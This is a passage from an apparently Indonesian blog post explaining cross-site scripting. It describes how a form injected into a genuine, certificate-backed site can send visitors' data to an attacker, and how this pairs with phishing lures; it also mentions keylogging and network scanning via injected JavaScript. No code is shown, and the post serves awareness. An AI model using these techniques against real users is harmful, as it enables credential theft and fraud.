Biasanya, Anda selalu diwanti oleh pihak agar mengecek keabsahan sertifikat ( dalam contoh ini adalah cybertrust ) yang digunakan untuk memastikan keaslian situs yang digunakan. Pada kasus ini sertifikat yang Anda lihat adalah asli dan sah namun ketika Anda memasukkan data kedalam text box dan mengklik tombol submit, informasi Anda akan dikirimkan kepada hacker! Kaget ? Teknik ini bisa dikombinasikan dengan teknik penipuan/social engineering seperti dengan mengirimkan email kepada korban dan menginformasikan kepadanya tentang undian berhadiah atau memintanya mengganti password melalui form palsu yang telah disediakan oleh Hacker. Saya yakin, banyak sekali yang ahli dalam hal Social Engineering dan tidak perlu lagi saya berikan contoh-contoh lainnya. Kini, apakah menurut Anda serangan XSS berbahaya atau tidak? Siapa yang harus bertanggung jawab seandainya terjadi korban dalam kasus semacam ini?
Serangan XSS yang saya tunjukkan pada artikel ini, masih sangat sederhana dan tidak melakukan deface pada halaman secara total seperti yang pernah ditunjukkan olehJim Ley dan Greenhalgh namun bukan berarti tidak mungkin untuk dilakukan.
Dengan menginjeksi javascript, bahkan bisa dibuat fungsi keylogger, scanning network, pencurian password lokal dan lain sebagainya. Jadi, akibat dari permasalahan XSS ini jelas sangat serius bila di eksploitasi oleh orang yang tepat.
Sekedar info :
"
XSS merupakan singkatan dari Cross Site Scripting memang tampak sedikit
aneh. Singkatan dari Cross Site Scripting seharusnya CSS namun
singkatan ini ternyata memberikan masalah bagi pengguna CSS telah
digunakan oleh Cascading Style Sheets, suatu bahasa yang digunakan untuk
mengatur tampilan halaman suatu dokumen web. CSS sendiri sangat populer
karena menawarkan fleksibilitas pengaturan tampilan dan akibatnya tentu
saja, akan membingungkan pengguna apabila terdapat dua singkatan yang
sama untuk menandakan dua hal yang berbeda sama sekali. Akhirnya, Cross
Site Scripting harus mengalah dan menggunakan singkatan XSS "
Langganan:
Postingan (Atom)















































